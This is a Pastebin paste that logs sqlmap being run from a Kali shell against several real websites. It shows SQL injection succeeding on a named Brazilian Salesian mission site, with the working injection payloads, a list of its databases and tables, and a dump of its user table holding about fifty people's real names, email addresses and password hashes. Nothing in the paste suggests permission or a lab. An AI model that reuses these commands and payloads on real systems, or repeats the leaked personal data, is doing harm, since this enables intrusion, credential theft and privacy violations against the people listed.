Advertisement
Guest User

Banco de dados www.missaosalesiana.org.br

a guest
Jul 3rd, 2016
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Usage: python sqlmap [options]
  2.  
  3. Options:
  4. -h, --help Show basic help message and exit
  5. -hh Show advanced help message and exit
  6. --version Show program's version number and exit
  7. -v VERBOSE Verbosity level: 0-6 (default 1)
  8.  
  9. Target:
  10. At least one of these options has to be provided to set the target(s)
  11.  
  12. -u URL, --url=URL Target URL (e.g. "www.target.com/vuln.php?id=1")
  13. -g GOOGLEDORK Process Google dork results as target URLs
  14.  
  15. Request:
  16. These options can be used to specify how to connect to the target URL
  17.  
  18. --data=DATA Data string to be sent through POST
  19. --cookie=COOKIE HTTP Cookie header
  20. --random-agent Use randomly selected HTTP User-Agent header
  21. --proxy=PROXY Use a proxy to connect to the target URL
  22. --tor Use Tor anonymity network
  23. --check-tor Check to see if Tor is used properly
  24.  
  25. Injection:
  26. These options can be used to specify which parameters to test for,
  27. provide custom injection payloads and optional tampering scripts
  28.  
  29. -p TESTPARAMETER Testable parameter(s)
  30. --dbms=DBMS Force back-end DBMS to this value
  31.  
  32. Detection:
  33. These options can be used to customize the detection phase
  34.  
  35. --level=LEVEL Level of tests to perform (1-5, default 1)
  36. --risk=RISK Risk of tests to perform (0-3, default 1)
  37.  
  38. Techniques:
  39. These options can be used to tweak testing of specific SQL injection
  40. techniques
  41.  
  42. --technique=TECH SQL injection techniques to use (default "BEUSTQ")
  43.  
  44. Enumeration:
  45. These options can be used to enumerate the back-end database
  46. management system information, structure and data contained in the
  47. tables. Moreover you can run your own SQL statements
  48.  
  49. -a, --all Retrieve everything
  50. -b, --banner Retrieve DBMS banner
  51. --current-user Retrieve DBMS current user
  52. --current-db Retrieve DBMS current database
  53. --passwords Enumerate DBMS users password hashes
  54. --tables Enumerate DBMS database tables
  55. --columns Enumerate DBMS database table columns
  56. --schema Enumerate DBMS schema
  57. --dump Dump DBMS database table entries
  58. --dump-all Dump all DBMS databases tables entries
  59. -D DB DBMS database to enumerate
  60. -T TBL DBMS database table(s) to enumerate
  61. -C COL DBMS database table column(s) to enumerate
  62.  
  63. Operating system access:
  64. These options can be used to access the back-end database management
  65. system underlying operating system
  66.  
  67. --os-shell Prompt for an interactive operating system shell
  68. --os-pwn Prompt for an OOB shell, meterpreter or VNC
  69.  
  70. General:
  71. These options can be used to set some general working parameters
  72.  
  73. --batch Never ask for user input, use the default behaviour
  74. --flush-session Flush session files for current target
  75.  
  76. Miscellaneous:
  77. --wizard Simple wizard interface for beginner users
  78.  
  79. [!] to see full list of options run with '-hh'
  80.  
  81. [*] shutting down at 12:42:18
  82.  
  83. root@kali:~# sqlmap --url "http://www.tribunaldenoticia.com/noticias/noticia.php?id=217" --dbs
  84.  
  85. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  86. http://sqlmap.org
  87.  
  88. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  89.  
  90. [*] starting at 12:43:18
  91.  
  92. [12:43:18] [INFO] testing connection to the target URL
  93. [12:43:18] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
  94. [12:43:18] [INFO] testing if the target URL is stable. This can take a couple of seconds
  95. [12:43:20] [INFO] target URL is stable
  96. [12:43:20] [INFO] testing if GET parameter 'id' is dynamic
  97. [12:43:20] [WARNING] GET parameter 'id' does not appear dynamic
  98. [12:43:20] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
  99. [12:43:20] [INFO] testing for SQL injection on GET parameter 'id'
  100. [12:43:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  101. [12:43:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  102. [12:43:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  103. [12:43:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
  104. [12:43:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  105. [12:43:27] [INFO] testing 'MySQL inline queries'
  106. [12:43:27] [INFO] testing 'PostgreSQL inline queries'
  107. [12:43:28] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
  108. [12:43:28] [INFO] testing 'Oracle inline queries'
  109. [12:43:28] [INFO] testing 'SQLite inline queries'
  110. [12:43:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  111. [12:43:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
  112. [12:43:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
  113. [12:43:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  114. [12:43:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  115. [12:43:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
  116. [12:43:35] [INFO] testing 'Oracle AND time-based blind'
  117. [12:43:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
  118. [12:43:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  119. [12:43:50] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
  120. [12:44:01] [WARNING] GET parameter 'id' is not injectable
  121. [12:44:01] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
  122. [12:44:01] [WARNING] HTTP error codes detected during run:
  123. 403 (Forbidden) - 225 times
  124.  
  125. [*] shutting down at 12:44:01
  126.  
  127. root@kali:~# sqlmap --url "http://www.agenciaaids.com.br/artigos/interna.php?id=447" --dbs
  128.  
  129. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  130. http://sqlmap.org
  131.  
  132. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  133.  
  134. [*] starting at 12:45:10
  135.  
  136. [12:45:11] [INFO] testing connection to the target URL
  137. [12:45:11] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
  138. [12:45:11] [INFO] testing if the target URL is stable. This can take a couple of seconds
  139. [12:45:12] [INFO] target URL is stable
  140. [12:45:12] [INFO] testing if GET parameter 'id' is dynamic
  141. [12:45:12] [WARNING] GET parameter 'id' does not appear dynamic
  142. [12:45:13] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
  143. [12:45:13] [INFO] testing for SQL injection on GET parameter 'id'
  144. [12:45:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  145. [12:45:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  146. [12:45:18] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  147. [12:45:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
  148. [12:45:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  149. [12:45:21] [INFO] testing 'MySQL inline queries'
  150. [12:45:21] [INFO] testing 'PostgreSQL inline queries'
  151. [12:45:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
  152. [12:45:21] [INFO] testing 'Oracle inline queries'
  153. [12:45:21] [INFO] testing 'SQLite inline queries'
  154. [12:45:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  155. [12:45:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
  156. [12:45:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
  157. [12:45:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  158. [12:45:27] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  159. [12:45:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
  160. [12:45:30] [INFO] testing 'Oracle AND time-based blind'
  161. [12:45:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
  162. [12:45:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  163. [12:45:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
  164. [12:45:59] [WARNING] GET parameter 'id' is not injectable
  165. [12:45:59] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Please retry with the switch '--text-only' (along with --technique=BU) as this case looks like a perfect candidate (low textual content along with inability of comparison engine to detect at least one dynamic parameter). Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
  166. [12:45:59] [WARNING] HTTP error codes detected during run:
  167. 403 (Forbidden) - 238 times
  168.  
  169. [*] shutting down at 12:45:59
  170.  
  171. root@kali:~# sqlmap --url "http://www.missaosalesiana.org.br/governo.php?id=1" --dbs
  172.  
  173. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  174. http://sqlmap.org
  175.  
  176. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  177.  
  178. [*] starting at 12:46:25
  179.  
  180. [12:46:26] [INFO] testing connection to the target URL
  181. [12:46:26] [INFO] testing if the target URL is stable. This can take a couple of seconds
  182. [12:46:27] [INFO] target URL is stable
  183. [12:46:27] [INFO] testing if GET parameter 'id' is dynamic
  184. [12:46:27] [INFO] confirming that GET parameter 'id' is dynamic
  185. [12:46:28] [WARNING] GET parameter 'id' does not appear dynamic
  186. [12:46:28] [INFO] testing for SQL injection on GET parameter 'id'
  187. [12:46:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  188. [12:46:28] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
  189. [12:46:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  190. [12:46:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  191. [12:46:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
  192. [12:46:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  193. [12:46:30] [INFO] testing 'MySQL inline queries'
  194. [12:46:31] [INFO] testing 'PostgreSQL inline queries'
  195. [12:46:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
  196. [12:46:31] [INFO] testing 'Oracle inline queries'
  197. [12:46:31] [INFO] testing 'SQLite inline queries'
  198. [12:46:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  199. [12:46:31] [WARNING] time-based comparison requires larger statistical model, please wait.....
  200. [12:46:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
  201. [12:46:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
  202. [12:46:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  203. [12:47:32] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
  204. [12:47:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  205. [12:47:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
  206. [12:47:33] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  207. [12:47:34] [INFO] target URL appears to have 4 columns in query
  208. [12:47:34] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
  209. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
  210. sqlmap identified the following injection points with a total of 42 HTTP(s) requests:
  211. ---
  212. Place: GET
  213. Parameter: id
  214. Type: boolean-based blind
  215. Title: AND boolean-based blind - WHERE or HAVING clause
  216. Payload: id=1 AND 1964=1964
  217.  
  218. Type: UNION query
  219. Title: MySQL UNION query (NULL) - 4 columns
  220. Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176667471,0x696d71704c536f6b4265,0x716f707371)#
  221.  
  222. Type: AND/OR time-based blind
  223. Title: MySQL > 5.0.11 AND time-based blind
  224. Payload: id=1 AND SLEEP(5)
  225. ---
  226. [12:47:36] [INFO] the back-end DBMS is MySQL
  227. web application technology: Apache
  228. back-end DBMS: MySQL 5.0.11
  229. [12:47:36] [INFO] fetching database names
  230. available databases [2]:
  231. [*] information_schema
  232. [*] painelflex03
  233.  
  234. [12:47:36] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.missaosalesiana.org.br'
  235.  
  236. [*] shutting down at 12:47:36
  237.  
  238. root@kali:~# sqlmap --url "http://www.missaosalesiana.org.br/governo.php?id=1" -D painelflex03
  239.  
  240. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  241. http://sqlmap.org
  242.  
  243. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  244.  
  245. [*] starting at 12:47:50
  246.  
  247. [12:47:50] [INFO] resuming back-end DBMS 'mysql'
  248. [12:47:50] [INFO] testing connection to the target URL
  249. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  250. ---
  251. Place: GET
  252. Parameter: id
  253. Type: boolean-based blind
  254. Title: AND boolean-based blind - WHERE or HAVING clause
  255. Payload: id=1 AND 1964=1964
  256.  
  257. Type: UNION query
  258. Title: MySQL UNION query (NULL) - 4 columns
  259. Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176667471,0x696d71704c536f6b4265,0x716f707371)#
  260.  
  261. Type: AND/OR time-based blind
  262. Title: MySQL > 5.0.11 AND time-based blind
  263. Payload: id=1 AND SLEEP(5)
  264. ---
  265. [12:47:50] [INFO] the back-end DBMS is MySQL
  266. web application technology: Apache
  267. back-end DBMS: MySQL 5.0.11
  268. [12:47:50] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.missaosalesiana.org.br'
  269.  
  270. [*] shutting down at 12:47:50
  271.  
  272. root@kali:~# sqlmap --url "http://www.missaosalesiana.org.br/governo.php?id=1" -D painelflex03 --tables
  273.  
  274. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  275. http://sqlmap.org
  276.  
  277. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  278.  
  279. [*] starting at 12:47:53
  280.  
  281. [12:47:54] [INFO] resuming back-end DBMS 'mysql'
  282. [12:47:54] [INFO] testing connection to the target URL
  283. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  284. ---
  285. Place: GET
  286. Parameter: id
  287. Type: boolean-based blind
  288. Title: AND boolean-based blind - WHERE or HAVING clause
  289. Payload: id=1 AND 1964=1964
  290.  
  291. Type: UNION query
  292. Title: MySQL UNION query (NULL) - 4 columns
  293. Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176667471,0x696d71704c536f6b4265,0x716f707371)#
  294.  
  295. Type: AND/OR time-based blind
  296. Title: MySQL > 5.0.11 AND time-based blind
  297. Payload: id=1 AND SLEEP(5)
  298. ---
  299. [12:47:54] [INFO] the back-end DBMS is MySQL
  300. web application technology: Apache
  301. back-end DBMS: MySQL 5.0.11
  302. [12:47:54] [INFO] fetching tables for database: 'painelflex03'
  303. Database: painelflex03
  304. [62 tables]
  305. +------------------------------------+
  306. | cid_obras |
  307. | cidade |
  308. | encontro_irmaos |
  309. | jornada_salesiana |
  310. | mat_backup |
  311. | obras |
  312. | sem_missionario |
  313. | uf |
  314. | w83__excl_proib |
  315. | w83__exclusao |
  316. | w83_anuario |
  317. | w83_anuario_anuario_funcao |
  318. | w83_anuario_falecio |
  319. | w83_anuario_funcao |
  320. | w83_anuario_governo |
  321. | w83_anuario_governo_nive |
  322. | w83_anuario_governo_nivel |
  323. | w83_anuario_obra |
  324. | w83_anuario_obra_anuario_obra_ativ |
  325. | w83_anuario_obra_ativ |
  326. | w83_banner |
  327. | w83_banner_cat |
  328. | w83_banner_stats |
  329. | w83_chamado_interacaow83 |
  330. | w83_chamado_tipow83 |
  331. | w83_chamadow83 |
  332. | w83_colaborador |
  333. | w83_contadorw83 |
  334. | w83_contato |
  335. | w83_contato_dest |
  336. | w83_enquete |
  337. | w83_enquete_resps |
  338. | w83_enquete_resps_votos |
  339. | w83_evento |
  340. | w83_ferramenta_campo |
  341. | w83_galeria |
  342. | w83_galeria_cat |
  343. | w83_galeria_fotos |
  344. | w83_grupo |
  345. | w83_grupo_assessor |
  346. | w83_grupo_ident |
  347. | w83_hotsite |
  348. | w83_inspetor |
  349. | w83_mail_em_grw83 |
  350. | w83_mail_emw83 |
  351. | w83_mail_enviow83 |
  352. | w83_mailw83 |
  353. | w83_mat |
  354. | w83_mat_cat |
  355. | w83_mat_sub |
  356. | w83_materia |
  357. | w83_materia_cat |
  358. | w83_materia_coment |
  359. | w83_materia_sub |
  360. | w83_projeto |
  361. | w83_revista_fotos |
  362. | w83_trilha |
  363. | w83_trilha_album |
  364. | w83_usuario |
  365. | w83_usuario_ferramenta |
  366. | w83_video |
  367. | w83_video_cat |
  368. +------------------------------------+
  369.  
  370. [12:47:54] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.missaosalesiana.org.br'
  371.  
  372. [*] shutting down at 12:47:54
  373.  
  374. root@kali:~# sqlmap --url "http://www.missaosalesiana.org.br/governo.php?id=1" -D painelflex03 -T w83_usuario --dump
  375.  
  376. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  377. http://sqlmap.org
  378.  
  379. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  380.  
  381. [*] starting at 12:48:37
  382.  
  383. [12:48:38] [INFO] resuming back-end DBMS 'mysql'
  384. [12:48:38] [INFO] testing connection to the target URL
  385. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  386. ---
  387. Place: GET
  388. Parameter: id
  389. Type: boolean-based blind
  390. Title: AND boolean-based blind - WHERE or HAVING clause
  391. Payload: id=1 AND 1964=1964
  392.  
  393. Type: UNION query
  394. Title: MySQL UNION query (NULL) - 4 columns
  395. Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176667471,0x696d71704c536f6b4265,0x716f707371)#
  396.  
  397. Type: AND/OR time-based blind
  398. Title: MySQL > 5.0.11 AND time-based blind
  399. Payload: id=1 AND SLEEP(5)
  400. ---
  401. [12:48:38] [INFO] the back-end DBMS is MySQL
  402. web application technology: Apache
  403. back-end DBMS: MySQL 5.0.11
  404. [12:48:38] [INFO] fetching columns for table 'w83_usuario' in database 'painelflex03'
  405. [12:48:38] [INFO] fetching entries for table 'w83_usuario' in database 'painelflex03'
  406. [12:48:38] [INFO] analyzing table dump for possible password hashes
  407. Database: painelflex03
  408. Table: w83_usuario
  409. [51 entries]
  410. +----+---------------------------------------------+------+-------+---------------------------------------------+-----------------+-------------+---------------------+-----------+---------------------+
  411. | id | nome | sexo | nivel | email | senha | empresa | a_atual | bloqueado | a_anterior |
  412. +----+---------------------------------------------+------+-------+---------------------------------------------+-----------------+-------------+---------------------+-----------+---------------------+
  413. | 1 | \xcanio Chaves Carvalho | M | 4 | enio@digitalmt.com.br | 9d962b8164d7b6a | Digital Art | 2012-01-17 14:43:43 | NULL | 2012-01-13 17:07:01 |
  414. | 2 | Fl\xe1dima Christofari | F | 3 | comunicacao@missaosalesiana.org.br | af197920dc701ec | <blank> | 2012-01-27 17:38:51 | NULL | 2012-01-27 14:58:05 |
  415. | 3 | Maur\xedcio Mendes Ortiz | M | 3 | mauricio@msmt.org.br | 60b43f3afe7757f | <blank> | 2009-08-18 09:38:00 | NULL | 2009-07-27 11:54:12 |
  416. | 56 | \xcanio | M | 4 | enio@pop.com.br | 2eb96c1d43b53b2 | <blank> | 2011-12-08 12:46:11 | NULL | 2011-10-13 09:30:17 |
  417. | 6 | Recep\xe7\xe3o | F | 3 | recepcao@missaosalesiana.org.br | ed95e52762ab7bf | <blank> | 2011-08-09 08:12:56 | NULL | 2011-08-07 19:41:41 |
  418. | 59 | Gilmar Vieira | M | 2 | ajs@missaosalesiana.org.br | 24aa901725e42b2 | <blank> | 2011-12-13 15:12:13 | NULL | 2011-12-13 15:12:12 |
  419. | 8 | L\xfadio da Silva | M | 2 | ludio@cdb.br | e2fef250410c520 | <blank> | 2012-01-27 08:42:11 | NULL | 2011-12-01 16:46:36 |
  420. | 9 | Patricia Geovana da Silva Brito | F | 2 | patriciageovanna05@hotmail.com | 436f2d10ecd8d57 | <blank> | 2012-01-26 15:35:28 | NULL | 2011-12-13 11:33:53 |
  421. | 49 | Mauri Silvestre do Couto | M | 2 | cpd@colegiosale.com.br | 78b1045c6aea2b4 | <blank> | 2011-04-13 08:55:45 | NULL | 2011-04-13 08:13:43 |
  422. | 13 | Osmar Orotides de Resende | M | 2 | osmaresende@hotmail.com | 3f9a3a5699e961c | <blank> | 2009-08-27 10:06:16 | NULL | NULL |
  423. | 14 | Marcel Silvestre do Couto | M | 2 | marcelcouto@gmail.com | 1d35346825a6bda | <blank> | 2010-03-01 20:12:55 | NULL | 2010-03-01 09:50:04 |
  424. | 15 | Alysson Jos\xe9 de Paula Silva | M | 2 | pastoral.cj-tl@missaosalesiana.org.br | b08fab69aece1a4 | <blank> | 2011-10-24 12:40:07 | NULL | 2011-10-24 11:30:22 |
  425. | 16 | Silvia Tada | F | 2 | silvia@ucdb.br | 382558c9ee44f7b | <blank> | 2011-01-24 14:37:25 | NULL | 2010-12-21 11:20:59 |
  426. | 17 | Jakson Pereira | M | 2 | jakson@ucdb.br | eaeb158b398c40a | <blank> | 2010-11-25 16:44:43 | NULL | 2010-10-26 16:10:20 |
  427. | 18 | Cleuza Maria Loubet Cardoso | F | 2 | assistencia.social@missaosalesiana.org.br | 36cdb2d2d5b5395 | <blank> | 2011-08-07 19:24:04 | NULL | 2009-12-01 09:12:53 |
  428. | 19 | Denise Regina Rosa Barbosa | F | 2 | juridico@missaosalesiana.org.br | fa5ffc337a8a2fc | <blank> | 2011-08-07 19:31:47 | NULL | 2009-12-29 14:13:07 |
  429. | 20 | Maikon Luis Malaquias | M | 2 | comunica@salesiano-ata.br | 37e13c25f1ea5a8 | <blank> | 2012-01-20 16:52:09 | NULL | 2012-01-16 09:07:10 |
  430. | 36 | Ampare | M | 2 | coordenador.ampare@missaosalesiana.org.br | d39b0d566e13c16 | <blank> | 2011-04-28 09:56:43 | NULL | 2011-04-28 09:48:16 |
  431. | 22 | Tatiana Ri\xe7a | F | 2 | tati.rica@hotmail.com | fdcea02e881bcc5 | <blank> | 2009-09-14 18:22:09 | NULL | 2009-09-14 17:56:24 |
  432. | 52 | Wellington Aguilar M. Proen\xe7a | M | 2 | wamp@santuariomariaauxiliadora.com.br | ae23953b9e61db8 | <blank> | 2011-08-07 19:37:43 | NULL | 2011-06-25 12:13:41 |
  433. | 24 | Luiz Felipe de Souza Jimenez | M | 2 | lipe2301@hotmail.com | 161237d66b8095a | <blank> | 2011-11-18 08:59:54 | NULL | 2011-11-17 09:28:40 |
  434. | 25 | Marcelo de Oliveira Pereira | M | 2 | mop.marcelo@gmail.com | e709109241e8f02 | <blank> | 2011-07-28 17:00:20 | NULL | 2011-07-27 16:13:46 |
  435. | 26 | Angelo C\xe9sar Cenerin | F | 2 | angelo@centrojuvenil.org.br | 04efb69af00d458 | <blank> | 2012-01-13 20:08:09 | NULL | 2011-08-05 19:13:01 |
  436. | 27 | Tamiris Riani Silv\xe9rio de Souza | F | 2 | tamirissouza@cssg.g12.br | e1cb45714c61f62 | <blank> | 2011-05-10 09:03:23 | NULL | 2009-12-15 15:22:17 |
  437. | 28 | Tarley da Guia Nunes da Mata | M | 2 | tirowa@gmail.com | 689ea35f534c3ec | <blank> | 2011-08-07 19:40:27 | NULL | 2010-09-08 00:13:41 |
  438. | 30 | Ros\xe2ngela Concei\xe7\xe3o Rodrigues Dias | F | 2 | rengeldias1@hotmail.com | e8a354b6dfe18cc | <blank> | 2009-09-23 22:25:47 | NULL | 2009-09-23 18:22:47 |
  439. | 50 | Jo\xe3o Antonio Madalosso J\xfanior | M | 2 | madalosso@missaosalesiana.org.br | 6a73691f33cf775 | <blank> | 2011-02-02 09:01:03 | NULL | 2011-02-02 08:56:46 |
  440. | 51 | Carlos Eduardo Rodrigues Or\xe1cio | M | 3 | comunicacao08@missaosalesiana.org.br | 1600dce77266877 | <blank> | 2012-01-13 13:53:03 | NULL | 2012-01-13 00:04:35 |
  441. | 33 | Vanderson de Souza Gomes | M | 2 | vanderson@missaosalesiana.org.br | df026689d7cc2db | <blank> | 2011-01-13 15:49:10 | NULL | 2011-01-13 15:35:18 |
  442. | 35 | Israel Rafael Esp\xedndola | M | 2 | comunicacaopsjb@hotmail.com | 8551f127f09a851 | <blank> | 2011-08-05 19:42:27 | NULL | 2010-03-31 10:33:00 |
  443. | 37 | Luiz Fernando Southier | M | 2 | luizsouthier@gmail.com | 39bf05d429d67f0 | <blank> | 2011-02-10 09:24:35 | NULL | 2010-10-18 11:29:27 |
  444. | 40 | Euller da Silva | M | 2 | euller@missaosalesiana.org.br | 634425147a31e0d | <blank> | 2010-08-23 17:17:29 | NULL | 2010-05-28 09:45:42 |
  445. | 41 | Vera L\xfacia Desmarest | F | 2 | assistencia.social05@missaosalesiana.org.br | d0150f46158c321 | <blank> | 2011-08-07 19:38:57 | NULL | 2010-04-26 14:55:39 |
  446. | 42 | Matheus Lima | M | 2 | matheuslima22@msn.com | ea1721f70e71839 | <blank> | 2011-09-30 09:58:47 | NULL | 2011-09-30 09:00:54 |
  447. | 43 | Mateus Rezende | M | 2 | mateusrezende.mr@gmail.com | 3f883b91bb3195d | <blank> | 2010-06-22 16:31:26 | NULL | 2010-06-22 16:31:26 |
  448. | 45 | Mestre Teixeira | M | 3 | economo@missaosalesiana.org.br | 909adc1236579a6 | <blank> | 2010-07-10 11:23:55 | NULL | 2010-07-10 11:20:50 |
  449. | 46 | Jos\xe9 Marcos de Oliveira | M | 2 | josemarcos@missaosalesiana.org.br | eac0874f66d9bb7 | <blank> | 2010-08-05 18:37:52 | NULL | 2010-07-28 08:42:00 |
  450. | 47 | Rafael Zanata Albertini | M | 2 | rafaelalbertini@missaosalesiana.org.br | e2e60b4317bb269 | <blank> | 2012-01-13 23:09:33 | NULL | 2011-01-28 09:31:28 |
  451. | 48 | Jo\xe3o Vitor Aparecido Ortiz | M | 2 | joaovitor@missaosalesiana.org.br | bb5255787864b25 | <blank> | 2011-08-07 19:34:12 | NULL | 2010-11-04 16:46:37 |
  452. | 53 | Wilson Roberto Marques | M | 2 | wilson@cssg.g12.br | 2d79f9ba9015f03 | <blank> | 2011-12-13 10:19:24 | NULL | 2011-12-12 11:10:38 |
  453. | 57 | Silvio Andrade | M | 2 | silviopress@terra.com.br | 1d7a7c6b50b4f8e | <blank> | 2011-05-30 15:12:05 | NULL | NULL |
  454. | 55 | Augusto Rodrigues de Souza | M | 2 | augusto@missaosalesiana.org.br | 42a4b2e7ba0d96f | <blank> | 2011-12-05 14:36:29 | NULL | 2011-11-24 17:50:17 |
  455. | 58 | Me. Stivanelli | M | 2 | rafaelcaldato@missaosalesiana.org.br | d8f837c19d628de | <blank> | 2011-11-03 10:47:05 | NULL | 2011-10-22 19:16:26 |
  456. | 60 | Diego Henrique Franco | M | 2 | tecnologia@missaosalesiana.org.br | 2e75310a0c95ca2 | <blank> | NULL | NULL | NULL |
  457. | 63 | Marcelo Uenaka | M | 2 | marketing@unisalesiano.edu.br | 1f7acd2e6e1fe1f | <blank> | NULL | NULL | NULL |
  458. | 61 | Rakel Faria Ferreira | F | 2 | rakelfferreira@gmail.com | 89794b621a313bb | <blank> | NULL | NULL | NULL |
  459. | 62 | Rafael Gustavo Santos Souza Lopes | M | 2 | rafaelgustav@hotmail.com | 89794b621a313bb | <blank> | NULL | NULL | NULL |
  460. | 64 | Fl\xe1dima Christofari | F | 2 | fladimachristofari@gmail.com | cbbbd598cd1c284 | <blank> | NULL | NULL | NULL |
  461. | 65 | P Jo\xe3o Marcos Ara\xfajo Ramos | M | 2 | joaoramos@missaosalesiana.org.br | 89794b621a313bb | <blank> | NULL | NULL | NULL |
  462. | 66 | Jo\xe3o Marcos de Ara\xfajo Ramos | M | 2 | joaomarcos@missaosalesiana.org.br | 89794b621a313bb | <blank> | NULL | NULL | NULL |
  463. | 67 | Tarley da Mata | M | 1 | tarley@missaosalesiana.org.br | cffc2e8269d1758 | <blank> | NULL | NULL | NULL |
  464. +----+---------------------------------------------+------+-------+---------------------------------------------+-----------------+-------------+---------------------+-----------+---------------------+
  465.  
  466. [12:48:38] [INFO] table 'painelflex03.w83_usuario' dumped to CSV file '/usr/share/sqlmap/output/www.missaosalesiana.org.br/dump/painelflex03/w83_usuario.csv'
  467. [12:48:38] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.missaosalesiana.org.br'
  468.  
  469. [*] shutting down at 12:48:38
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement